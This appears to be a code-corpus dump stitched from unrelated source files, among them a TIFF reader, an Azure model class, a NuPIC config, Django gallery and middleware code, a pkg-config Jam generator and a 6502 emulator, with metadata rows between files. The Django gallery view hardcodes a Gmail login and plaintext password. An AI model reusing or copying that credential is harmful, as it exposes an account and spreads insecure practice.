tiff_page_list_index = numpy.ravel_multi_index(tiff_page_ndindex, self._non_page_shape)
logger.debug( "Reading page: {} = {}".format( tuple(tiff_page_ndindex), tiff_page_list_index ) )
page_data = vigra.impex.readImage(self._filepath, dtype='NATIVE', index=int(tiff_page_list_index), order='C')
else:
# Only a single page
page_data = vigra.impex.readImage(self._filepath, dtype='NATIVE', index=0, order='C')
page_data = page_data.withAxes(self._page_axes)
assert page_data.shape == self._page_shape, \
"Unexpected page shape: {} vs {}".format( page_data.shape, self._page_shape )
result[ roi_page_ndindex ] = page_data[roiToSlice(*roi_within_page)]
def propagateDirty(self, slot, subindex, roi):
if slot == self.Filepath:
self.Output.setDirty( slice(None) )
if __name__ == "__main__":
from lazyflow.graph import Graph
graph = Graph()
opReader = OpTiffReader(graph=graph)
opReader.Filepath.setValue('/groups/flyem/home/bergs/Downloads/Tiff_t4_HOM3_10frames_4slices_28sec.tif')
print opReader.Output.meta.axistags
print opReader.Output.meta.shape
print opReader.Output.meta.dtype
print opReader.Output[2:3,2:3,2:3,10:20,20:50].wait().shape
# opReader.Filepath.setValue('/magnetic/data/synapse_small.tiff')
# print opReader.Output.meta.axistags
# print opReader.Output.meta.shape
# print opReader.Output.meta.dtype
|
lgpl-3.0
| 642,158,149,604,213,600
| 42.964497
| 125
| 0.577793
| false
| 3.746848
| false
| false
| false
|
sharadagarwal/autorest
|
AutoRest/Generators/Python/Azure.Python.Tests/Expected/AcceptanceTests/StorageManagementClient/storagemanagementclient/models/check_name_availability_result.py
|
1
|
1683
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class CheckNameAvailabilityResult(Model):
"""
The CheckNameAvailability operation response.
:param name_available: Gets a boolean value that indicates whether the
name is available for you to use. If true, the name is available. If
false, the name has already been taken or invalid and cannot be used.
:type name_available: bool
:param reason: Gets the reason that a storage account name could not be
used. The Reason element is only returned if NameAvailable is false.
Possible values include: 'AccountNameInvalid', 'AlreadyExists'
:type reason: str or :class:`Reason
<storagemanagementclient.models.Reason>`
:param message: Gets an error message explaining the Reason value in more
detail.
:type message: str
"""
_attribute_map = {
'name_available': {'key': 'nameAvailable', 'type': 'bool'},
'reason': {'key': 'reason', 'type': 'Reason'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(self, name_available=None, reason=None, message=None):
self.name_available = name_available
self.reason = reason
self.message = message
|
mit
| 6,416,804,943,986,815,000
| 39.071429
| 77
| 0.630422
| false
| 4.585831
| false
| false
| false
|
akhilaananthram/nupic.research
|
sequence_prediction/continuous_sequence/swarm_sine/description.py
|
1
|
12630
|
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
Template file used by the OPF Experiment Generator to generate the actual
description.py file by replacing $XXXXXXXX tokens with desired values.
This description.py file was generated by:
'/Users/ycui/nta/nupic/nupic/frameworks/opf/exp_generator/ExpGenerator.pyc'
"""
from nupic.frameworks.opf.expdescriptionapi import ExperimentDescriptionAPI
from nupic.frameworks.opf.expdescriptionhelpers import (
updateConfigFromSubConfig,
applyValueGettersToContainer
)
from nupic.frameworks.opf.clamodelcallbacks import *
from nupic.frameworks.opf.metrics import MetricSpec
from nupic.frameworks.opf.opfutils import (InferenceType,
InferenceElement)
from nupic.support import aggregationDivide
from nupic.frameworks.opf.opftaskdriver import (
IterationPhaseSpecLearnOnly,
IterationPhaseSpecInferOnly,
IterationPhaseSpecLearnAndInfer)
# Model Configuration Dictionary:
#
# Define the model parameters and adjust for any modifications if imported
# from a sub-experiment.
#
# These fields might be modified by a sub-experiment; this dict is passed
# between the sub-experiment and base experiment
#
#
config = {
# Type of model that the rest of these parameters apply to.
'model': "CLA",
# Version that specifies the format of the config.
'version': 1,
# Intermediate variables used to compute fields in modelParams and also
# referenced from the control section.
'aggregationInfo': { 'days': 0,
'fields': [],
'hours': 0,
'microseconds': 0,
'milliseconds': 0,
'minutes': 0,
'months': 0,
'seconds': 0,
'weeks': 0,
'years': 0},
'predictAheadTime': None,
# Model parameter dictionary.
'modelParams': {
# The type of inference that this model will perform
'inferenceType': 'TemporalMultiStep',
'sensorParams': {
# Sensor diagnostic output verbosity control;
# if > 0: sensor region will print out on screen what it's sensing
# at each step 0: silent; >=1: some info; >=2: more info;
# >=3: even more info (see compute() in py/regions/RecordSensor.py)
'verbosity' : 0,
# Example:
# 'encoders': {'field1': {'fieldname': 'field1', 'n':100,
# 'name': 'field1', 'type': 'AdaptiveScalarEncoder',
# 'w': 21}}
#
'encoders': {
u'data': { 'clipInput': True,
'fieldname': u'data',
'maxval': 1.0,
'minval': -1.0,
'n': 100,
'name': u'data',
'type': 'ScalarEncoder',
'w': 21},
'_classifierInput': { 'classifierOnly': True,
'clipInput': True,
'fieldname': u'data',
'maxval': 1.0,
'minval': -1.0,
'n': 100,
'name': '_classifierInput',
'type': 'ScalarEncoder',
'w': 21},
},
# A dictionary specifying the period for automatically-generated
# resets from a RecordSensor;
#
# None = disable automatically-generated resets (also disabled if
# all of the specified values evaluate to 0).
# Valid keys is the desired combination of the following:
# days, hours, minutes, seconds, milliseconds, microseconds, weeks
#
# Example for 1.5 days: sensorAutoReset = dict(days=1,hours=12),
#
# (value generated from SENSOR_AUTO_RESET)
'sensorAutoReset' : None,
},
'spEnable': True,
'spParams': {
# Spatial pooler implementation to use.
# Options: "py" (slow, good for debugging), and "cpp" (optimized).
'spatialImp': 'cpp',
# SP diagnostic output verbosity control;
# 0: silent; >=1: some info; >=2: more info;
'spVerbosity' : 0,
'globalInhibition': 1,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
'inputWidth': 0,
# SP inhibition control (absolute value);
# Maximum number of active columns in the SP region's output (when
# there are more, the weaker ones are suppressed)
'numActiveColumnsPerInhArea': 40,
'seed': 1956,
# potentialPct
# What percent of the columns's receptive field is available
# for potential synapses.
'potentialPct': 0.8,
# The default connected threshold. Any synapse whose
# permanence value is above the connected threshold is
# a "connected synapse", meaning it can contribute to the
# cell's firing. Typical value is 0.10. Cells whose activity
# level before inhibition falls below minDutyCycleBeforeInh
# will have their own internal synPermConnectedCell
# threshold set below this default value.
# (This concept applies to both SP and TP and so 'cells'
# is correct here as opposed to 'columns')
'synPermConnected': 0.1,
'synPermActiveInc': 0.05,
'synPermInactiveDec': 0.0005,
'maxBoost': 2.0
},
# Controls whether TP is enabled or disabled;
# TP is necessary for making temporal predictions, such as predicting
# the next inputs. Without TP, the model is only capable of
# reconstructing missing sensor inputs (via SP).
'tpEnable' : True,
'tpParams': {
# TP diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
# (see verbosity in nupic/trunk/py/nupic/research/TP.py and TP10X*.py)
'verbosity': 0,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
# The number of cells (i.e., states), allocated per column.
'cellsPerColumn': 32,
'inputWidth': 2048,
'seed': 1960,
# Temporal Pooler implementation selector (see _getTPClass in
# CLARegion.py).
'temporalImp': 'cpp',
# New Synapse formation count
# NOTE: If None, use spNumActivePerInhArea
'newSynapseCount': 20,
# Maximum number of synapses per segment
'maxSynapsesPerSegment': 32,
# Maximum number of segments per cell
'maxSegmentsPerCell': 128,
# Initial Permanence
'initialPerm': 0.21,
# Permanence Increment
'permanenceInc': 0.1,
# Permanence Decrement
# If set to None, will automatically default to tpPermanenceInc
# value.
'permanenceDec' : 0.1,
'globalDecay': 0.0,
'maxAge': 0,
# Minimum number of active synapses for a segment to be considered
# during search for the best-matching segments.
# None=use default
# Replaces: tpMinThreshold
'minThreshold': 12,
# Segment activation threshold.
# A segment is active if it has >= tpSegmentActivationThreshold
# connected synapses that are active due to infActiveState
# None=use default
# Replaces: tpActivationThreshold
'activationThreshold': 16,
'outputType': 'normal',
# "Pay Attention Mode" length. This tells the TP how many new
# elements to append to the end of a learned sequence at a time.
# Smaller values are better for datasets with short sequences,
# higher values are better for datasets with long sequences.
'pamLength': 1,
},
'clParams': {
'regionName' : 'CLAClassifierRegion',
# Classifier diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
'clVerbosity' : 0,
# This controls how fast the classifier learns/forgets. Higher values
# make it adapt faster and forget older patterns faster.
'alpha': 0.001,
# This is set after the call to updateConfigFromSubConfig and is
# computed from the aggregationInfo and predictAheadTime.
'steps': '1',
},
'anomalyParams': { u'anomalyCacheRecords': None,
u'autoDetectThreshold': None,
u'autoDetectWaitRecords': None},
'trainSPNetOnlyIfRequested': False,
},
}
# end of config dictionary
# Adjust base config dictionary for any modifications if imported from a
# sub-experiment
updateConfigFromSubConfig(config)
# Compute predictionSteps based on the predictAheadTime and the aggregation
# period, which may be permuted over.
if config['predictAheadTime'] is not None:
predictionSteps = int(round(aggregationDivide(
config['predictAheadTime'], config['aggregationInfo'])))
assert (predictionSteps >= 1)
config['modelParams']['clParams']['steps'] = str(predictionSteps)
# Adjust config by applying ValueGetterBase-derived
# futures. NOTE: this MUST be called after updateConfigFromSubConfig() in order
# to support value-getter-based substitutions from the sub-experiment (if any)
applyValueGettersToContainer(config)
control = {
# The environment that the current model is being run in
"environment": 'nupic',
# Input stream specification per py/nupic/frameworks/opf/jsonschema/stream_def.json.
#
'dataset' : { u'info': u'sine',
u'streams': [ { u'columns': [u'*'],
u'info': u'sine.csv',
u'last_record': 1800,
u'source': u'file://data/sine.csv'}],
u'version': 1},
# Iteration count: maximum number of iterations. Each iteration corresponds
# to one record from the (possibly aggregated) dataset. The task is
# terminated when either number of iterations reaches iterationCount or
# all records in the (possibly aggregated) database have been processed,
# whichever occurs first.
#
# iterationCount of -1 = iterate over the entire dataset
'iterationCount' : 4000,
# A dictionary containing all the supplementary parameters for inference
"inferenceArgs":{u'inputPredictedField': 'auto',
u'predictedField': u'data',
u'predictionSteps': [1]},
# Metrics: A list of MetricSpecs that instantiate the metrics that are
# computed for this experiment
'metrics':[
MetricSpec(field=u'data', metric='multiStep', inferenceElement='multiStepBestPredictions', params={'window': 1800, 'steps': [1], 'errorMetric': 'aae'}),
MetricSpec(field=u'data', metric='multiStep', inferenceElement='multiStepBestPredictions', params={'window': 1800, 'steps': [1], 'errorMetric': 'nrmse'})
],
# Logged Metrics: A sequence of regular expressions that specify which of
# the metrics from the Inference Specifications section MUST be logged for
# every prediction. The regex's correspond to the automatically generated
# metric labels. This is similar to the way the optimization metric is
# specified in permutations.py.
'loggedMetrics': ['.*'],
}
descriptionInterface = ExperimentDescriptionAPI(modelConfig=config,
control=control)
|
gpl-3.0
| -6,689,820,296,016,079,000
| 35.293103
| 157
| 0.611876
| false
| 4.38694
| true
| false
| false
|
mcxiaoke/python-labs
|
scripts/youqian2toshl.py
|
1
|
1237
|
#!/bin/env python3
import csv
import sys
from datetime import datetime
rows = []
with open(sys.argv[1]) as f:
fc = csv.reader(f)
headers = next(fc)
for r in fc:
di = datetime.strptime(r[0], '%Y-%m-%d')
r_date = datetime.strftime(di, '%m/%d/%y')
r_account = '现金'
r_cate = r[3]
if r_cate == '零食烟酒':
r_cate = '零食'
r_tag = ''
r_out = r[5]
r_in = '0'
r_type = 'CNY'
r_out2 = r[5]
r_type2 = 'CNY'
r_comment = r[4] + ' - '+r[7]
new_row = (r_date, r_account, r_cate, r_tag, r_out,
r_in, r_type, r_out2, r_type2, r_comment)
# print(r)
print(new_row)
rows.append(new_row)
# "日期","账户","类别","标签","支出金额","收入金额","货币","以主要货币","主要货币","说明"
# ('08/13/20', '现金', '零食', '', '35.50', '0', 'CNY', '35.50', 'CNY', '饮料 - 超市买纯净水M')
with open('to.csv', 'w') as f:
fc = csv.writer(f)
fc.writerow(('日期', '账户', '类别', '标签', '支出金额',
'收入金额', '货币', '以主要货币', '主要货币', '说明'))
for r in rows:
fc.writerow(r)
|
apache-2.0
| -8,167,431,639,492,582,000
| 27.447368
| 83
| 0.454209
| false
| 2.140594
| false
| false
| false
|
rivelo/portal
|
gallery/views.py
|
1
|
4808
|
# -*- coding: utf-8 -*-
from django.http import HttpResponse
#from django.shortcuts import render_to_response
from django.shortcuts import render, redirect
from django.template import RequestContext
from django.http import HttpResponseRedirect, HttpRequest, HttpResponseNotFound
from django.conf import settings
from portal.event_calendar.views import embeded_calendar
from portal.funnies.views import get_funn
from models import Album, Photo
import gdata.photos.service
import gdata.media
import gdata.geo
def custom_proc(request):
# "A context processor that provides 'app', 'user' and 'ip_address'."
return {
'app': 'Rivelo catalog',
'user': request.user,
'ip_address': request.META['REMOTE_ADDR']
}
def get_album():
list = []
album_list = []
gd_client = gdata.photos.service.PhotosService()
gd_client.email = "velorivne@gmail.com"
gd_client.password = "gvelovelo"
gd_client.source = 'velorivne_albums'
gd_client.ProgrammaticLogin()
username = "velorivne@gmail.com"
albums = gd_client.GetUserFeed(user=username)
for album in albums.entry:
print 'title: %s, number of photos: %s, id: %s' % (album.title.text, album.numphotos.text, album.gphoto_id.text)
album_list.append(album.title.text)
photos = gd_client.GetFeed('/data/feed/api/user/%s/albumid/%s?kind=photo' % (username, album.gphoto_id.text))
for photo in photos.entry:
print 'Photo title:', photo.title.text
list.append(photo.content.src)
return list, album_list
def albums_page(request):
photo1 = Photo.objects.random()
photo2 = Photo.objects.random()
albums = Album.objects.all()
vars = {'weblink': 'photo.html', 'sel_menu': 'photo', 'photo1': photo1, 'photo2': photo2, 'albums': albums, 'entry': get_funn()}
calendar = embeded_calendar()
vars.update(calendar)
return render(request, 'index.html', vars)
#return render_to_response('index.html', vars, context_instance=RequestContext(request, processors=[custom_proc]))
def album_page(request, id):
photo1 = Photo.objects.random()
photo2 = Photo.objects.random()
album = Album.objects.get(album_id=id)
album_name = album.title + " - " + str(album.numphotos) + " фото"
photos = Photo.objects.filter(album = album)
vars = {'weblink': 'photo_album.html', 'sel_menu': 'photo', 'photo1': photo1, 'photo2': photo2, 'album_name': album_name, 'photos': photos, 'entry': get_funn()}
calendar = embeded_calendar()
vars.update(calendar)
#return render_to_response('index.html', vars, context_instance=RequestContext(request, processors=[custom_proc]))
return render(request, 'index.html', vars)
def gallery_page(request):
photo1 = Photo.objects.random()
photo2 = Photo.objects.random()
# p_list, albums = get_album()
albums = Album.objects.all()
p_list = Photo.objects.filter(album = albums[3])
vars = {'weblink': 'photo.html', 'sel_menu': 'photo', 'photo_list': p_list[:10], 'photo1': photo1, 'photo2': photo2, 'albums': albums}
calendar = embeded_calendar()
vars.update(calendar)
#p_list = p_list[:10]
# return render_to_response('index.html', {'weblink': 'photo.html', 'sel_menu': 'photo', 'photo_list': p_list[:10], 'albums': albums}, context_instance=RequestContext(request, processors=[custom_proc]))
#return render_to_response('index.html', vars, context_instance=RequestContext(request, processors=[custom_proc]))
return render(request, 'index.html', vars)
def create_db(request):
username = 'rivelo2010@gmail.com'
gd_client = gdata.photos.service.PhotosService()
albums = gd_client.GetUserFeed(user=username)
for album in albums.entry:
print 'title: %s, number of photos: %s, id: %s' % (album.title.text, album.numphotos.text, album.gphoto_id.text)
try:
alb = Album(title=album.title.text, url=album.GetHtmlLink().href, numphotos=album.numphotos.text, album_id=album.gphoto_id.text)
alb.save()
except:
# do not duplicate albums
pass
photos = gd_client.GetFeed('/data/feed/api/user/%s/albumid/%s?kind=photo' % (username, album.gphoto_id.text))
for photo in photos.entry:
print 'Photo title:', photo.title.text
try:
p = Photo(album=alb, title=photo.title.text, image=photo.media.thumbnail[2].url, url=photo.content.src, pub_date=photo.timestamp.datetime(), filename=photo.media.title.text, photo_id=photo.gphoto_id.text, height=int(photos.entry[0].height.text), width=int(photos.entry[0].width.text))
p.save()
except:
# do not duplicate albums
pass
return HttpResponse("Дані додано")
|
gpl-2.0
| 6,949,792,971,498,934,000
| 43.388889
| 300
| 0.664581
| false
| 3.329167
| false
| false
| false
|
vmrob/needy
|
needy/generators/pkgconfig_jam.py
|
1
|
6825
|
from ..generator import Generator
import logging
import os
import subprocess
import textwrap
import hashlib
class PkgConfigJamGenerator(Generator):
@staticmethod
def identifier():
return 'pkgconfig-jam'
def generate(self, needy):
path = os.path.join(needy.needs_directory(), 'pkgconfig.jam')
env = os.environ.copy()
env['PKG_CONFIG_LIBDIR'] = ''
packages, broken_package_names = self.__get_pkgconfig_packages(env=env)
owned_packages = self.__get_owned_packages(needy, packages)
if broken_package_names:
logging.warn('broken packages found: {}'.format(' '.join(broken_package_names)))
contents = self.__get_header(self.__escape(env.get('PKG_CONFIG_PATH', '')))
contents += self.__get_path_targets(needy, packages)
contents += self.__get_pkg_targets(needy, packages)
contents += self.__get_pkgconfig_rules(needy, packages, owned_packages, broken_package_names)
with open(path, 'w') as f:
f.write(contents)
@classmethod
def __get_pkgconfig_packages(cls, env):
packages = []
broken_package_names = []
package_names = [line.split()[0] for line in subprocess.check_output(['pkg-config', '--list-all'], env=env).decode().splitlines()]
for package in package_names:
try:
pkg = {}
pkg['name'] = package
pkg['location'] = os.path.realpath(subprocess.check_output(['pkg-config', package, '--variable=pcfiledir'], env=env).decode().strip())
pkg['cflags'] = subprocess.check_output(['pkg-config', package, '--cflags'], env=env).decode().strip()
pkg['ldflags'] = subprocess.check_output(['pkg-config', package, '--libs', '--static'], env=env).decode().strip()
packages.append(pkg)
except subprocess.CalledProcessError:
broken_package_names.append(package)
continue
return packages, broken_package_names
@classmethod
def __get_owned_packages(cls, needy, packages):
owned_packages = []
for package in packages:
if not os.path.relpath(package['location'], os.path.realpath(needy.needs_directory())).startswith('..'):
owned_packages.append(package)
return owned_packages
@classmethod
def __get_header(cls, pkg_config_path):
return textwrap.dedent('''\
INSTALL_PREFIX = [ option.get prefix : "/usr/local" ] ;
PKG_CONFIG_PATH = "{pkg_config_path}" ;
import notfile ;
import project ;
local p = [ project.current ] ;
''').format(
pkg_config_path=pkg_config_path
)
@classmethod
def __get_path_targets(cls, needy, packages):
lines = ''
paths = set([os.path.abspath(os.path.join(p['location'], '..', '..')) for p in packages])
for path in paths:
path_hash = hashlib.sha256(path.encode('utf-8')).hexdigest().lower()
# This is the worst. Specifically, Boost Build is the worst. Their semaphore
# targets appear to be entirely broken (in addition to factually incorrect
# documentation) and so we have to write our own semaphore to ensure that
# this sort of file copying to $(INSTALL_PREFIX) occurs atomically.
#
# The reason this is necessary at all is due to a race condition in
# cp/mkdir of the destination path that errors on duplicate
# files/directories even in the presence of the -p flag.
lines += textwrap.dedent('''\
actions copy-path-{path_hash}-action {{
set -e ; trap "{{ rmdir $(INSTALL_PREFIX)/needy-copy-path.lock 2>/dev/null || true ; }}" EXIT TERM INT
mkdir -p $(INSTALL_PREFIX) && test -d $(INSTALL_PREFIX) && test -w $(INSTALL_PREFIX)
until mkdir -p $(INSTALL_PREFIX)/needy-copy-path.lock 2>/dev/null ; do python -c "import time;time.sleep(0.1)" ; done
cp -pR {path}/* $(INSTALL_PREFIX)/
}}
notfile.notfile copy-path-{path_hash} : @$(__name__).copy-path-{path_hash}-action ;
$(p).mark-target-as-explicit copy-path-{path_hash} ;
''').format(path_hash=path_hash, path=path)
return lines
@classmethod
def __get_pkg_targets(cls, needy, packages):
lines = ''
for package in packages:
path = os.path.abspath(os.path.join(package['location'], '..', '..'))
path_hash = hashlib.sha256(path.encode('utf-8')).hexdigest().lower()
lines += 'alias {}-package : : : : <cflags>"{}" <linkflags>"{}" ;\n'.format(package['name'], PkgConfigJamGenerator.__escape(package['cflags']), PkgConfigJamGenerator.__escape(package['ldflags']))
lines += textwrap.dedent('''\
alias install-{package}-package : copy-path-{path_hash} ;
''').format(package=package['name'], path_hash=path_hash)
if not os.path.relpath(package['location'], os.path.realpath(needy.needs_directory())).startswith('..'):
lines += 'alias install-{package}-package-if-owned : install-{package}-package ;\n'.format(package=package['name'])
else:
lines += 'alias install-{package}-package-if-owned ;\n'.format(package=package['name'])
lines += textwrap.dedent('''\
$(p).mark-target-as-explicit install-{package}-package install-{package}-package-if-owned ;
''').format(package=package['name'])
return lines
@classmethod
def __get_pkgconfig_rules(cls, needy, packages, owned_packages, broken_package_names):
return textwrap.dedent('''\
PKG_CONFIG_PACKAGES = {pkg_config_packages} ;
OWNED_PKG_CONFIG_PACKAGES = {owned_pkg_config_packages} ;
rule dependency ( name : packages * ) {{
if ! $(packages) {{
packages = $(name) ;
}}
if $(packages) in $(PKG_CONFIG_PACKAGES) {{
alias $(name) : $(packages)-package ;
alias install-$(name)-if-owned : install-$(packages)-package-if-owned ;
local p = [ project.current ] ;
$(p).mark-target-as-explicit install-$(name)-if-owned ;
}}
}}
''').format(
pkg_config_packages=' '.join([package['name'] for package in packages if package['name'] not in broken_package_names]),
owned_pkg_config_packages=' '.join([p['name'] for p in owned_packages])
)
@classmethod
def __escape(cls, s):
return s.replace('\\', '\\\\').replace('"', '\\"')
|
mit
| 410,549,216,565,586,900
| 44.5
| 207
| 0.572161
| false
| 4.113924
| true
| false
| false
|
jammon/gemeinde
|
gottesdienste/migrations/0004_auto__add_field_gottesdienst_dauer__add_field_gottesdienst_ort.py
|
1
|
2642
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Gottesdienst.dauer'
db.add_column(u'gottesdienste_gottesdienst', 'dauer',
self.gf('django.db.models.fields.IntegerField')(default=60),
keep_default=False)
# Adding field 'Gottesdienst.ort'
db.add_column(u'gottesdienste_gottesdienst', 'ort',
self.gf('django.db.models.fields.CharField')(default='', max_length=50, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Gottesdienst.dauer'
db.delete_column(u'gottesdienste_gottesdienst', 'dauer')
# Deleting field 'Gottesdienst.ort'
db.delete_column(u'gottesdienste_gottesdienst', 'ort')
models = {
u'gottesdienste.gottesdienst': {
'Meta': {'object_name': 'Gottesdienst'},
'datum': ('django.db.models.fields.DateTimeField', [], {}),
'dauer': ('django.db.models.fields.IntegerField', [], {'default': '60'}),
'freitext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'ort': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'prediger': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'prediger_key': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['gottesdienste.Prediger']", 'null': 'True', 'blank': 'True'}),
'predigttext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'titel': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'})
},
u'gottesdienste.prediger': {
'Meta': {'object_name': 'Prediger'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nachname': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'titel': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'}),
'vorname': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'})
}
}
complete_apps = ['gottesdienste']
|
mit
| 1,991,793,960,841,552,400
| 48.867925
| 154
| 0.571537
| false
| 3.440104
| false
| false
| false
|
katharine-kinn/django-sql-debugger
|
sql_debugger/middleware.py
|
1
|
1318
|
import json
from django.db import connections, connection
from django.conf import settings
__all__ = ['SQLDebugMiddleware']
class SQLDebugMiddleware(object):
def process_response(self, request, response):
if not settings.DEBUG:
return response
if request.is_ajax():
if response.status_code / 100 == 2:
try:
resp_d = json.loads(response.content)
resp_d['path'] = request.get_full_path()
resp_d['sql_debug_info'] = connection.queries
response.content = json.dumps(resp_d)
except Exception, e:
pass
else:
parts = {
"traceback": "Traceback"
}
empty_line = '\n\n'
resp_parts = response.content.split(empty_line)
res = { "error": resp_parts[0] }
for rp in resp_parts:
for k,p in parts.iteritems():
if rp.startswith(p):
res[k] = rp
response.content = json.dumps(
{
"errordata": res, "path": request.get_full_path()
}
)
return response
|
mit
| 3,783,446,745,468,610,600
| 28.954545
| 73
| 0.455994
| false
| 4.827839
| false
| false
| false
|
ajgrah2000/pytari2600
|
pytari2600/cpu_gen/core.py
|
1
|
34536
|
from . import addressing
from . import instructions
from . import pc_state
class OpDecoder(object):
def __init__(self, pc_state, memory, instruction_lookup):
self.pc_state = pc_state
self.memory = memory
self.instruction_lookup = instruction_lookup
pass
def execute(self):
""" On first execution, replace the 'execute' call with more
direct/custom/generated function. """
op_code = self.memory.read(self.pc_state.PC)
instruction = self.instruction_lookup[op_code].clone()
# Calls 'exeucte' first, to allow it to 'replace itself'
instruction.execute()
self.execute = instruction.execute
class Core(object):
"""
CPU Core - Contains op code mappings.
"""
def __init__(self, clocks, memory, pc_state):
self.clocks = clocks
self.memory = memory
self.pc_state = pc_state
# Different addressing modes
self.aIZX = addressing.AddressIZX(self.pc_state, self.memory)
self.aIZY = addressing.AddressIZY(self.pc_state, self.memory)
self.aIMM = addressing.AddressIMM(self.pc_state, self.memory)
self.aZP = addressing.AddressZP (self.pc_state, self.memory)
self.aZPX = addressing.AddressZPX(self.pc_state, self.memory)
self.aZPY = addressing.AddressZPY(self.pc_state, self.memory)
self.aAbs = addressing.AddressAbs(self.pc_state, self.memory)
self.aAbx = addressing.AddressAbx(self.pc_state, self.memory)
self.aAby = addressing.AddressAby(self.pc_state, self.memory)
self.aInd = addressing.AddressIndirect(self.pc_state, self.memory)
self.aAcc = addressing.AddressAccumulator(self.pc_state, self.memory)
# Different instruction types
self.r = instructions.Reading(self.pc_state, self.memory)
self.nullR = instructions.NullReading(self.pc_state, self.memory)
self.aR = instructions.AccumulatorReading(self.pc_state, self.memory)
self.w = instructions.Writing(self.pc_state, self.memory)
self.regW = instructions.RegWriting(self.pc_state, self.memory)
self.nullW = instructions.NullWriting(self.pc_state, self.memory)
self.aW = instructions.AccumulatorWriting(self.pc_state, self.memory)
self.instruction_exe = instructions.InstructionExec(self.pc_state)
self.instruction_lookup = [False] * 256
self.PROGRAM_ENTRY_ADDR = 0xFFFC
self.memory = memory
self.pc_state.P.value = 0
self.pc_state.PC = 0x1000
# Generate instances of the op decoder
self.op_decoder = [OpDecoder(pc_state, memory, self.instruction_lookup) for x in range(0x10000)]
def get_save_state(self):
state = {}
state['pc_state'] = self.pc_state.get_save_state()
return state
def set_save_state(self, state):
self.pc_state.set_save_state(state['pc_state'])
def reset(self):
# 6502 Reset vector location.
self.pc_state.PC = self.memory.read16(self.PROGRAM_ENTRY_ADDR)
def initialise(self):
# 6502 Reset vector location.
self.populate_instruction_map()
def step(self):
self.op_decoder[self.memory.cartridge.get_absolute_address(self.pc_state.PC)].execute()
def populate_instruction_map(self):
dummy = pc_state.PC_Register()
# Single byte instructions (including ASL, ROL and LSR in accumulator modes)
self.instruction_lookup[0xEA] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.A, self.pc_state.A, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x0A] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.A, self.pc_state.A, self.instruction_exe.ASL_exec)
self.instruction_lookup[0x4A] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.A, self.pc_state.A, self.instruction_exe.LSR_exec)
self.instruction_lookup[0xE8] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.X, self.pc_state.X, self.instruction_exe.INC_exec)
self.instruction_lookup[0xC8] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.Y, self.pc_state.Y, self.instruction_exe.INC_exec)
self.instruction_lookup[0xCA] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.X, self.pc_state.X, self.instruction_exe.DEC_exec)
self.instruction_lookup[0x88] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.Y, self.pc_state.Y, self.instruction_exe.DEC_exec)
self.instruction_lookup[0x18] = instructions.SingleByteInstruction(self.clocks, self.pc_state, dummy, dummy, self.instruction_exe.CLC_exec)
self.instruction_lookup[0xD8] = instructions.SingleByteInstruction(self.clocks, self.pc_state, dummy, dummy, self.instruction_exe.CLD_exec)
self.instruction_lookup[0x58] = instructions.SingleByteInstruction(self.clocks, self.pc_state, dummy, dummy, self.instruction_exe.CLI_exec)
self.instruction_lookup[0xB8] = instructions.SingleByteInstruction(self.clocks, self.pc_state, dummy, dummy, self.instruction_exe.CLV_exec)
self.instruction_lookup[0x38] = instructions.SingleByteInstruction(self.clocks, self.pc_state, dummy, dummy, self.instruction_exe.SEC_exec)
self.instruction_lookup[0x78] = instructions.SingleByteInstruction(self.clocks, self.pc_state, dummy, dummy, self.instruction_exe.SEI_exec)
self.instruction_lookup[0xF8] = instructions.SingleByteInstruction(self.clocks, self.pc_state, dummy, dummy, self.instruction_exe.SED_exec)
# Break instruction, software 'interrupt'
self.instruction_lookup[0x00] = instructions.BreakInstruction(self.clocks, self.pc_state, self.memory, None)
# Register Transfers
